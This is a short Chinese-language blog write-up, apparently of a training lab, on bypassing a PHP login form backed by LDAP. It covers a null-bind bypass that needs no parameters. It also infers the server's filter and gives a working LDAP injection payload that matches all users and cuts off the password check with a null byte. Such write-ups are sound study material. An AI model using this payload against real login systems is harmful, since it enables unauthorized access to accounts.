Attack 目標網站如下圖所示。由此頁面可發現 :
項目 | 資訊 |
program language | PHP |
Input |
$_GET['username'] $_GET['password'] |
Example 1
某些LDAP Server傳送NULL後會保持連線,而PHP會將其視為授權成功。因此不給任何參數即可By Pass認證。
Example 2
通過幾經測試可推估Server端LDAP 語法為
( & cn = $_GET['name'])( userPassword=HASH[$_GET['password']) )
因此注入(cn = *) 為所有使用者,%00 則是空字串。
name=hacker)(cn=*))%00%&password=asdafasfsag
文章標籤
全站熱搜